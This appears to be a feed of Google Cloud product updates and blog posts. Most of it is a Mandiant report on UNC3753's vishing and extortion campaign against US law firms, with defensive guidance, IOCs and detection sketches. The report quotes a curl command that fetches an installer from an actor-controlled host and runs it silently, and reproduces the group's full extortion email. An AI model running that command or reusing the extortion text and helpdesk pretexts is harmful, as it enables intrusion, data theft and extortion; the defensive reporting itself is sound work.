Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model. Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.

Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via Vertex AI and developers via the Gemini API in Google AI Studio.
TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee
Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.

Register for the TechTalk
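The polling side of the Device Authorization Grant can be sketched as a short loop following RFC 8628: keep polling while the response is `authorization_pending`, add 5 seconds to the interval on `slow_down`, and stop on any other error. Here `request_token` is a hypothetical stand-in for the POST to the token endpoint, so the loop can run without a server.

```python
"""Sketch of the RFC 8628 device-flow polling loop on the client side.

`request_token` is a hypothetical callable standing in for a POST to the
token endpoint with grant_type=urn:ietf:params:oauth:grant-type:device_code.
"""
import time
from typing import Callable, Dict


def poll_for_token(request_token: Callable[[], Dict[str, str]],
                   interval: int = 5, expires_in: int = 600,
                   sleep: Callable[[float], None] = time.sleep) -> Dict[str, str]:
    waited = 0
    while waited < expires_in:
        sleep(interval)
        waited += interval
        response = request_token()
        error = response.get("error")
        if error is None:
            return response  # contains the access_token
        if error == "authorization_pending":
            continue  # the user has not finished approving yet
        if error == "slow_down":
            interval += 5  # RFC 8628: increase the interval by 5 seconds
            continue
        # For example access_denied or expired_token.
        raise RuntimeError(f"device authorization failed: {error}")
    raise TimeoutError("device code expired before the user approved")


# Usage with scripted responses and a recording sleep in place of time.sleep.
responses = iter([
    {"error": "authorization_pending"},
    {"error": "slow_down"},
    {"access_token": "tok-123", "token_type": "Bearer"},
])
waits = []
token = poll_for_token(lambda: next(responses), sleep=waits.append)
print(token["access_token"], waits)
```

Injecting `sleep` keeps the loop testable; a real headless device would use the default `time.sleep` and the `interval` and `expires_in` values returned by the device authorization endpoint.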

Feb 23 - Feb 27

Pro-level image generation gets faster and more accessible with Nano Banana 2
Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model here.

The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud
Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.

By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy.

Learn more.
Stop typing, start interacting! The Gemini Live Agent Challenge is here. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!

Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at geminiliveagentchallenge.devpost.com

Feb 9 - Feb 13

Introducing Gemini 3.1 Pro on Google Cloud.
3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our goal to help you transform your business for the agentic future. Learn more about the model’s capabilities here. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Automate Storage Compatibility with GKE Dynamic Default Storage Classes
Managing storage across mixed-generation VM clusters in GKE just got easier. With the new Dynamic Default Storage Class, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.

Explore automated disk type selection
Community TechTalk: AI-Powered Apigee Development with strofa.io
Join the Apigee community on February 26 for a deep dive into strofa.io. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.

Register now to reserve your spot.

Jan 26 - Jan 30

Simplify API Governance with Native OpenAPI v3 Support
Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.

Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.

Accelerate API Testing with the New Open Source API Tester
Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like proxy.basepath without leaving your terminal.

Explore the API Tester guide and start testing your proxies today.
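API Tester's own YAML test format is not reproduced here. To illustrate what a JSONPath assertion checks, the following Python sketch resolves a small subset of JSONPath (`$`, dotted keys, and `[n]` array indexes) against a response body and compares the result with an expected value. The function names and the supported syntax are assumptions for illustration only, not API Tester's implementation.

```python
import json
import re
from typing import Any

# One path segment: ".key" or "[index]" (a deliberately small JSONPath subset).
_SEGMENT = re.compile(r"\.([A-Za-z_][A-Za-z0-9_]*)|\[(\d+)\]")


def resolve(path: str, document: Any) -> Any:
    """Resolve a path such as $.items[0].id against parsed JSON."""
    if not path.startswith("$"):
        raise ValueError(f"path must start with '$': {path!r}")
    current = document
    pos = 1
    while pos < len(path):
        match = _SEGMENT.match(path, pos)
        if match is None:
            raise ValueError(f"unsupported syntax at {path[pos:]!r}")
        key, index = match.groups()
        # Dict lookup for ".key", list indexing for "[n]".
        current = current[key] if key is not None else current[int(index)]
        pos = match.end()
    return current


def assert_jsonpath(body: str, path: str, expected: Any) -> None:
    """Raise AssertionError with a readable message if the value differs."""
    actual = resolve(path, json.loads(body))
    if actual != expected:
        raise AssertionError(f"{path}: expected {expected!r}, got {actual!r}")


# Usage against a hypothetical proxy response body.
response = '{"status": "ok", "items": [{"id": 42, "name": "widget"}]}'
assert_jsonpath(response, "$.status", "ok")
assert_jsonpath(response, "$.items[0].id", 42)
```

A real test framework would add wildcards, filters, and richer matchers; this sketch only shows the resolve-then-compare idea.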
Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid
Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via kubectl, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.

Implement Kubernetes Secrets in your hybrid proxies.
See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud
Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings -> Appearance menu.

Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!
Apigee X Networking: PSC or VPC Peering?
Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.

Watch the video.

Jan 19 - Jan 23

Bridge the Gap: Excel-to-API Conversion in Apigee Portals
Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.

Learn how to build it.
Elevate your applications with Firestore’s new advanced query engine
We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.

Learn more about Firestore pipeline operations.

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Fri, 05 Jun 2026 14:00:00 +0000

Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan

Introduction

From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," "Chatty Spider," and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.

UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice-related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.

Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.

This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.

Threat Detail

The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant investigated incidents, the entire attack sequence—from initial target contact to data theft and extortion—occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour.

The threat group frequently initiates campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message, for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's concern about a possible security issue so they are more susceptible to the follow-up voice call.

Figure 1: UNC3753 attack lifecycle

Initial Access via IT Helpdesk Impersonation

The core of UNC3753's entry mechanism is targeted vishing. Mandiant has observed the group targeting personnel at all seniority levels, often harvesting their phone numbers and email addresses from staff listings on the organization's public website. Posing as members of the organization's internal IT helpdesk or security team, the threat actors then call these employees directly.

The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or assisting with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.

Remote Screen Control and Legitimate Tool Abuse

Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications.

Screen-Sharing Utilities

UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.

Commercial RMM Agents

UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.

Message Delivery via Privnote

Threat actors consistently use privnote[.]com, a web-based, self-destructing note service, to transmit installation links and commands to targets. Because each note is destroyed once read, the links and commands that targets copy and paste leave no lasting record in chat logs or in the endpoint's browser.

Example cURL command staging string observed in UNC3753 remote sessions:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
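The logic of the Google SecOps rule for this pattern is not published in this post. As a hedged illustration only, the Python sketch below flags a single command line that downloads an .msi with curl and then installs that same file silently with msiexec, which is the shape of the staging string above. The regular expressions and the function name are assumptions; a production detection would also correlate separate process-creation events rather than rely on one command line.

```python
import re

# Heuristic patterns for the staging-string shape shown above (illustrative only).
CURL_DOWNLOAD = re.compile(
    r'\bcurl(?:\.exe)?\b.*?\s-o\s+"?([^\s"]+\.msi)"?', re.IGNORECASE
)
MSIEXEC_QUIET = re.compile(
    r'\bmsiexec(?:\.exe)?\b.*?\s/i\s+"?([^\s"]+\.msi)"?.*?\s/(?:quiet|qn)\b',
    re.IGNORECASE,
)


def is_curl_msi_install(command_line: str) -> bool:
    """Return True if one command line downloads an .msi with curl and then
    silently installs the same file with msiexec."""
    download = CURL_DOWNLOAD.search(command_line)
    install = MSIEXEC_QUIET.search(command_line)
    if not (download and install):
        return False
    # Windows file names are case-insensitive, so compare lowercased names.
    return download.group(1).lower() == install.group(1).lower()
```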

Infrastructure Pivoting and Local Staging

Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (Windows365.exe) or Citrix clients.

Once VDI environment access is secured, the threat actors pivot to corporate file systems:

System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.
Targeted Harvesting from Document Management Systems: Threat actors target specific legal and document storage repositories.
Keyword Search and File Staging: Threat actors run keyword searches within iManage to locate highly sensitive folders containing tax forms (W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). They compile and sort the results in subdirectories the target can access, primarily the user's Downloads folder or Roaming profile directory.

Data Theft

UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.

Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.
FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.
Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.

Threat Actor Extortion Tactics

The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment.

These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).

Sample Extortion Email

Subject: [Victim Name] has lost confidential data of their clients. Very Important!

Hello,

We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. <mentions the general nature of the stolen documents>. This is not a joke or a scam.

This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.

Reply to Our email and We will show you the complete file tree and actual files.

We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.

We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.

In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.

In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.

Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.

Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.

As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.

Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.

All further communication can be done through this email address.

Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.

Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.

Figure 2: UNC3753 extortion note example

Data Leak Site

Figure 3: LEAKEDDATA DLS (partially redacted; cropped)

Suspected UNC3753 Activity Involving Physical Access

While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in-person access. This escalating tactic is corroborated by a recent FBI Cyber FLASH Alert highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.

According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.

Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.

Attribution

GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. UNC3753 (aliases: "Luna Moth," "Chatty Spider," and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall"-style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized extortion operations based solely on data theft, typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686, which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.

Remediation and Hardening

To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:

User Education

Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.

Physical Access and Verification Policies

Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:

Require visitors to display official credentials and photo identification.
Require front-desk staff to copy and log all physical visitor IDs before granting access.
Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.
Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.

Remote Access Conditional Access Controls

Implement conditional access policies for remote access so that only corporate-owned devices can authenticate to virtual desktop infrastructure (VDI) or virtual private network (VPN) gateways. This gives the organization more control over, and visibility into, potential Remote Monitoring and Management (RMM) usage.

Enforce Strict RMM and Screen-Sharing Software Controls

Audit corporate environments and block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g., Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.
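Blocking belongs in an application control product, but a quick audit of an existing process or software inventory can show where unapproved remote access tools are already present. The Python sketch below compares executable names from such an inventory against a policy allowlist and a small watchlist of tools named in this post. The watchlist file names and the `(hostname, image_path)` record shape are assumptions; verify real binary names in your environment and extend the list with the Bomgar, Zoho Assist, and SuperOps agents you observe.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# Hypothetical watchlist of executable names for tools named in this post.
# Vendors rename binaries between versions, so treat this as a starting point.
WATCHLIST = {"anydesk.exe", "winscp.exe", "rclone.exe"}


def audit_processes(records, approved):
    """Group hosts by watchlisted executable that policy does not approve.

    records: iterable of (hostname, full_image_path) pairs from an inventory export.
    approved: set of lowercase executable names permitted by policy.
    """
    findings = defaultdict(set)
    for host, image_path in records:
        # PureWindowsPath parses Windows paths on any OS without touching the disk.
        name = PureWindowsPath(image_path).name.lower()
        if name in WATCHLIST and name not in approved:
            findings[name].add(host)
    return dict(findings)
```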

Endpoint Removable Media Hardening

To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations on all corporate endpoints, and on BYOD systems used for VDI access, to restrict:

USB storage device installation.
Removable media access.
Optical media writes.

Network Monitoring and Egress Control

Monitor firewall logs, network flows, and endpoint execution logs for activity indicative of data staging and exfiltration. Specifically:

Block or alert on outbound connections to unauthorized file-sharing services and consumer email providers.
Ensure full session logging, including bytes transferred, is enabled in firewall log configurations.
Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.
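As a minimal sketch of the SSH monitoring guidance, the Python below sums bytes sent per internal source host to destination port 22 and flags hosts above a threshold; WinSCP and Rclone both support SFTP, which runs over SSH. The `Flow` record shape, the 1 GiB default threshold, and the use of Python's `ipaddress` `is_private` check (which covers RFC 1918 plus other reserved ranges) to separate internal from external addresses are all assumptions to adapt to your firewall's session log schema.

```python
import ipaddress
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """One firewall session record (hypothetical schema)."""
    src_ip: str
    dst_ip: str
    dst_port: int
    bytes_sent: int  # bytes from source to destination, from session logging


def flag_ssh_egress(flows, threshold_bytes=1 << 30):
    """Return {src_ip: total_bytes} for internal hosts that sent more than
    threshold_bytes over SSH (port 22) to external destinations."""
    totals = Counter()
    for flow in flows:
        src = ipaddress.ip_address(flow.src_ip)
        dst = ipaddress.ip_address(flow.dst_ip)
        # Count only internal-to-external SSH sessions.
        if flow.dst_port == 22 and src.is_private and not dst.is_private:
            totals[flow.src_ip] += flow.bytes_sent
    return {ip: total for ip, total in totals.items() if total > threshold_bytes}
```

A fixed threshold is the simplest choice; per-host baselines would reduce noise from legitimate administrative SFTP use.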

Application Log and Access Auditing

Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.

Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.
Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage.
Implement strict BYOD authentication controls, requiring step-up MFA challenges when accessing VDI nodes.
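The alerting guidance for rapid searches and mass downloads can be approximated with a per-user sliding window: keep the timestamps of each user's recent search and download events and alert when the count inside the window reaches a threshold. The Python sketch below does this over a time-ordered event stream. The `(timestamp, user, action)` event shape, the 10-minute window, and the threshold of 50 are illustrative assumptions, not iManage or SharePoint settings.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def spike_alerts(events, window=timedelta(minutes=10), threshold=50):
    """Yield (user, timestamp, count) when a user's search/download events
    within the trailing window reach the threshold.

    events: iterable of (timestamp, user, action) tuples sorted by timestamp.
    """
    recent = defaultdict(deque)  # user -> timestamps inside the current window
    for ts, user, action in events:
        if action not in {"search", "download"}:
            continue
        q = recent[user]
        q.append(ts)
        # Drop events that have fallen out of the trailing window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            yield user, ts, len(q)
            q.clear()  # reset so one burst produces one alert
```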

Outlook and Implications

The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.

Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations.

Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.

Data Leak Site (DLS)

UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.

hxxps[:]//business-data-leaks[.]com

Phishing Domains

GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.

<organization>-itdesk[.]com
<organization>-it[.]com
<organization>-helpdesk[.]com
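These naming conventions lend themselves to a simple pattern check against DNS or proxy logs. The Python sketch below refangs indicators written with `[.]`, `[:]`, or `hxxp`, then flags domains (or their subdomains) that match the `<organization>-itdesk`, `-it`, or `-helpdesk` `.com` pattern for a given organization name. The organization slug and the exact matching rules are assumptions; lookalikes that use typos or other TLDs would slip past this check.

```python
import re


def refang(indicator: str) -> str:
    """Convert a defanged indicator such as example[.]com back to example.com."""
    return indicator.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def helpdesk_lookalike(domain: str, org: str) -> bool:
    """Return True if domain matches <org>-itdesk.com, <org>-it.com, or
    <org>-helpdesk.com (or a subdomain of one), case-insensitively."""
    pattern = re.compile(
        rf"(?:^|\.){re.escape(org.lower())}-(?:itdesk|it|helpdesk)\.com$"
    )
    # Normalize: refang, lowercase, and strip a trailing root dot from DNS logs.
    return pattern.search(refang(domain).lower().rstrip(".")) is not None
```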

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

IOC Type	Indicator
IPv4 Address	192.236.147.131
IPv4 Address	192.236.147.138
IPv4 Address	193.141.60.212
IPv4 Address	192.236.154.158
IPv4 Address	192.236.146.173
IPv4 Address	174.169.162.62
IPv4 Address	64.94.84.97
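As a lightweight complement to the GTI Collection, the IPv4 indicators in the table can be checked against exported logs directly. The Python sketch below extracts dotted-quad addresses from log lines, validates them with the standard `ipaddress` module, and reports lines that mention a listed indicator. The log format in the test is an assumption; the sketch matches exact addresses only and performs no enrichment.

```python
import ipaddress
import re

# IPv4 indicators from the table above.
IOC_IPS = {
    ipaddress.IPv4Address(ip)
    for ip in (
        "192.236.147.131", "192.236.147.138", "193.141.60.212",
        "192.236.154.158", "192.236.146.173", "174.169.162.62", "64.94.84.97",
    )
}

# Candidate dotted quads; validation below discards values like 999.1.1.1.
IPV4_CANDIDATE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def ioc_hits(lines):
    """Yield (line_number, matched_ip) for each IOC address found in the lines."""
    for number, line in enumerate(lines, start=1):
        for candidate in IPV4_CANDIDATE.findall(line):
            try:
                address = ipaddress.IPv4Address(candidate)
            except ValueError:
                continue  # not a valid IPv4 address
            if address in IOC_IPS:
                yield number, str(address)
```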

Google Security Operations (SecOps)

Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

Execute MSI Files Downloaded via Curl
Suspected Rclone Exfiltration

MITRE ATT&CK

Tactic	Technique ID	Technique Name
Initial Access	T1566.004	Phishing: Spearphishing Voice
Initial Access	T1133	External Remote Services
Execution	T1204.002	User Execution: Malicious File
Execution	T1059.001	Command and Scripting Interpreter: PowerShell
Execution	T1059.003	Command and Scripting Interpreter: Windows Command Shell
Execution	T1569.002	System Services: Service Execution
Persistence	T1053.005	Scheduled Task/Job: Scheduled Task
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion	T1036.005	Masquerading: Match Legitimate Name or Location
Defense Evasion	T1553.002	Subvert Trust Controls: Code Signing
Defense Evasion	T1562.001	Impair Defenses: Disable or Modify Tools
Defense Evasion	T1070.001	Indicator Removal: Clear Windows Event Logs
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory
Credential Access	T1003.002	OS Credential Dumping: Security Account Manager
Discovery	T1083	File and Directory Discovery
Discovery	T1135	Network Share Discovery
Discovery	T1046	Network Service Discovery
Lateral Movement	T1219	Remote Access Software
Lateral Movement	T1021.001	Remote Services: Remote Desktop Protocol
Lateral Movement	T1021.004	Remote Services: SSH
Collection	T1005	Data from Local System
Command & Control	T1572	Protocol Tunneling
Exfiltration	T1020	Automated Exfiltration
Exfiltration	T1567.002	Exfiltration Over Web Service: Exfiltration to Cloud Storage
Exfiltration	T1052.001	Exfiltration Over Physical Medium: Exfiltration over USB
Impact	T1486	Data Encrypted for Impact

What's new for Managed Service for Apache Spark clusters

Thu, 04 Jun 2026 16:00:00 +0000

At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks.

We recently announced that the Dataproc service is now Managed Service for Apache Spark, reflecting our deep integration with the Agentic Data Cloud.

To support the diverse architectural needs of today’s modern data teams, we offer the service in two distinct deployment modes: serverless and managed clusters. The serverless deployment mode completely abstracts infrastructure management for ephemeral or ad-hoc jobs, while the managed clusters deployment mode is designed for teams that require fine-grained infrastructure customization, persistent environments, long-running stateful processing, or native integration with custom Compute Engine hardware configurations.

When it comes to managed cluster deployments, we’ve re-imagined the experience from the ground up, focusing on three core pillars: making Spark faster by supercharging execution speeds, easier to run by maximizing resource obtainability and reducing operational overhead, and smarter by embedding AI directly into the development and operational lifecycle.

This blog post focuses specifically on what we announced at Google Cloud Next ’26 for the Managed Spark clusters deployment mode: enhanced flexibility to fine-tune performance and cost through a native execution engine, smarter scaling policies, and Gemini-powered extensions. For the latest on the serverless deployment mode, check out this blog.

Faster, with the Lightning Engine native execution engine

